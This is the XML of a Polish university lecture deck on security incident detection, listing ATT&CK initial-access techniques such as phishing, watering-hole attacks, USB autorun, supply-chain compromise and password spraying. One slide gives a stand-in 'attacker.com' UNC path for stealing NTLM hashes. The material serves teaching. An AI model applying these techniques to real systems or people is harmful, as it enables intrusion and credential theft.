            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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autoresponder/odpowiedź zawierająca stopkę (format, styl, ewentualne miejsce umieszczenia logo firmy)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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ustalenie, jakiego klienta poczty lub jakiej przeglądarki używa ofiara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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Phishing a inżynieria społeczna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51" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787680" y="1013040"/>
            <a:ext cx="11147760" cy="48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Zdarza się również, że właściwy atak phishingowy poprzedzony jest wymianą naturalnie wyglądającej komunikacji z ofiarą, co ma na celu uśpić jej czujność i zbudować zaufanie (inżynieria społeczna, manipulacja)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Mogą to być maile, może to być komunikator/serwis społecznościowy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Ekstremalnym przypadkiem jest długotrwałe budowanie relacji celem zdobycia zaufania (scenariusze zakrawające na metody szpiegów i psychopatów)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Innym bardzo skutecznym sposobem ataku jest podszywanie się pod zaufany podmiot poprzez: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spoofing (sfałszowanie adresu źródłowego email / numeru źródłowego wiadomości SMS (CallerID spoofing))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włamanie się na konto danego podmiotu zaufanego i posłużenie się nim do zaatakowania innych podmiotów, które mu ufają (dobrym przykładem jest BEC - Business Email Compromise)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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Drive By Compromise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53" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933480" y="1197720"/>
            <a:ext cx="11147760" cy="521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Nazywany również "watering hole" oraz "strategic web compromise"</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Wektorem ataku są strony www regularnie i naturalnie odwiedzane przez użytkowników (np. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="21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https://po.edu.pl/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, jeśli celem są pracownicy/studenci Politechniki Opolskiej)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Strony te stają się wektorem ataku w wyniku złośliwej ingerencji w nie przez atakującego:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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włamanie do panelu administracyjego strony/na serwer hostujący stronę</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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wykupienie reklam na danej stronie i osadzenie w nich złośliwego kodu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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wykorzystanie istniejącej funkcjonalności/podatności w aplikacji webowej</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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Przeglądarka atakowana jest poprzez:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2100" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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exploity wykorzystujące podatność w samej przeglądarce (przede wszystkim RCE, ale również np. kradzież pliku czy automatyczne zażądanie linku UNC (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>\\attacker.com\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) mające na celu wykradnięcie hasha NTLM (Windows) celem złamania hasła atakiem słownikowym</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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zawartość (HTML, JavaScript) wykorzystującą element socjotechniki, skłaniające użytkownika do interakcji prowadzącej do pobrania i wykonania na swoim systemie złośliwego kodu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="21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exploit wykorzystujące luki w innych aplikacjach webowych będących celem (kradzież tokenów OAuth, ataki Cross-Site Scripting/Cross-Site Request Forgery)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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Replication Through Removable Media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55" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="2198160"/>
            <a:ext cx="11147760" cy="379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</a:rPr>
              <a:t>Wektor ataku wykorzystuje przenośne nośniki pamięci (aktualnie pendrive'y USB, kiedyś były to dyskietki, później płyty CD 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😃</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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</a:rPr>
              <a:t>Stosowany do atakowania systemów fizycznie odizolowanych od sieci (ang. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>airgapped</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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</a:rPr>
              <a:t>Wykorzystuje mechanizmy takie jak:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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</a:rPr>
              <a:t>autorun (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>autorun.inf</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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</a:rPr>
              <a:t>modyfikacje oryginalnych instalatorów</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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</a:rPr>
              <a:t>modyfikacje samego firmware urządzenia</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="27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</a:rPr>
              <a:t>mylące nazwy plików</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Supply Chain Compromise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57" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="1836000"/>
            <a:ext cx="11478600" cy="464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</a:rPr>
              <a:t>Złośliwe zmodyfikowanie produktów lub kanałów ich dostawy przed otrzymaniem ich przez ofiarę</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>Może mieć miejsce na dowolnym etapie dostarczania, np:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>modyfikacja narzędzi deweloperskich przeznaczonych do wytworzenia plików wykonywalnych</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>modyfikacja środowiska deweloperskiego</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>modyfikacja repozytoriów z kodem źródłowym (publicznych/prywatnych)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>modyfikacja kodu zależności</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>manipulacja mechanizmów aktualizacji/dystrybucji oprogramowania</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>modyfikacja nośników na etapie produkcji</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>sprzedaż zmodyfikowanych wersji legalnym dystrybutorom</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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</a:rPr>
              <a:t>modyfikacja/zamiana nośników poprzez przechwycenie ich dostawy</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="23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endParaRPr b="0" lang="en-US" sz="2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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Czym jest bezpieczeństwo ofensywne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51" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372600" y="1298160"/>
            <a:ext cx="11446200" cy="48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Bezpieczeństwo jest ściśle powiązane z pojęciem konfliktu i zagrożenia</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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Z tego też wywodzi się terminologia (ofensywa - ang. offense, defensywa - ang. defense)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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ofensywa = atak</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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ofensywa jest aktywnością skupioną na wrogim (mającym na celu wyrządzenie szkody) działaniu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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stąd też wiele używanych tutaj terminów wywodzi się z wojskowości (np. ang. "objective", "operator", "war room", "kill chain", itd.)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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Trusted Relationship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59" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812880" y="1318320"/>
            <a:ext cx="11147760" cy="254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Wykorzystanie relacji zaufania między ofiarą a stroną trzecią</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Zaatakowanie zaufanego ofierze podmiotu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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organizacji (np. dostawcy, klienta, partnera biznesowego, instytucji)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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osoby</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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infrastruktury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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Initial Access - Valid Accounts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61" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916200" y="1111320"/>
            <a:ext cx="11147760" cy="460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Wykorzystanie prawidłowych, istniejących w atakowanym systemie poświadczeń (ang. credentials) - najczęściej jest to po prostu nazwa użytkownika i hasło</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Funkcjonuje kilka metod zdobywania prawidłowych poświadczeń:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Ataki oparte o statystykę (w miarę możliwości poprzedzone ustalaniem listy prawidłowych istniejących kont - ang. account enumeration):</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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Brute force</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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Password spraying!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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Password reuse (określany również jako credential stuffing)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="12574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Password mutation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Uzyskiwanie haseł w wyniku ataków phishingowych</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="25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Wydobywanie haseł z innych, już skompromitowanych systemów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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ATT&amp;CK for Enterprise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63" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189440" y="6488640"/>
            <a:ext cx="83350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https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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://attack.mitre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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.org/matrices/enterprise/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64" name="Picture 1" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="916200" y="1055520"/>
            <a:ext cx="10714680" cy="5098320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:solidFill>
              <a:srgbClr val="4472c4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object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540440" y="3153240"/>
            <a:ext cx="9151200" cy="546840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="7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</a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3590" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Koniec części #III</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3590" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7395480" y="3561480"/>
            <a:ext cx="27000" cy="6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410" spc="-38" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="9e9c9e"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="41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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Czym jest bezpieczeństwo ofensywne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53" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372600" y="1299960"/>
            <a:ext cx="11446200" cy="389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Działania ofensywne prowadzą do osiągnięcia celu w sposób nieautoryzowany (wbrew woli i bez zgody/wiedzy  podmiotu będącego celem)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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Tematem tych zajęć jest wyłącznie domena IT (cyberbezpieczeństwo)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Bezpieczeństwo ofensywne skupia się na nieautoryzowanym przejmowaniu kontroli nad systemami i nieautoryzowanym uzyskiwaniem dostępu do informacji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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="12035520" cy="127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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Fundamentalne różnice między defensywą a ofensywą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55" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="2040120"/>
            <a:ext cx="11446200" cy="21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Defensywa i ofensywa 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nie są</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> wobec siebie w pełni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 symetryczne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pl-PL" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Nie do końca są to „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dwie strony tej samej monety"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bject 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Bezpieczeństwo ofensywne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57" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1450440"/>
            <a:ext cx="11446200" cy="542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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>jest aktywne (zarówno w teorii jak i praktyce)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>kreatywne (odkrywa nowe podatności, wynajduje nowe metody ataków)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ma decydujący wpływ na to, kiedy i jak przeprowadzony zostanie atak</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>zawsze wykonuje pierwszy krok (przewaga)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ma większy wpływ na bieg wydarzeń</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>ma większy wpływ na reguły gry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="34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endParaRPr b="0" lang="en-US" sz="3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object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255960" y="78840"/>
            <a:ext cx="1203552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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Bezpieczeństwo defensywne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59" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550440" y="1450440"/>
            <a:ext cx="11446200" cy="426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reaktywne (jest reakcją/wynikiem/efektem ubocznym/konsekwencją działań ofensywnych)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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nowe zabezpieczenia są odpowiedzią na nowe metody ataków</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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nawet, gdy defensywa jest proaktywna i wykonuje kroki wyprzedzające...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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... są one wynikiem zdolności broniących do myślenia ofensywnego (przewidywanie i wyprzedzanie działań atakujących)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Powszechnie mawia się: "jeśli chcesz złapać hakera, musisz myśleć jak on"</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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Ja preferuję sformułowanie: "do powstrzymania hakera potrzebny jest inny haker"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4832</TotalTime>
  <Application>LibreOffice/7.3.0.3$Windows_X86_64 LibreOffice_project/0f246aa12d0eee4a0f7adcefbf7c878fc2238db3</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>3483</Words>
  <Paragraphs>372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2020-02-01T16:36:23Z</dcterms:created>
  <dc:creator>Julian Horoszkiewicz</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-28T11:33:10Z</dcterms:modified>
  <cp:revision>514</cp:revision>
  <dc:subject/>
  <dc:title>Wykrywanie i reagowanie na incydenty bezpieczeństwa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35</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>53</vt:i4>
  </property>
</Properties>
</file>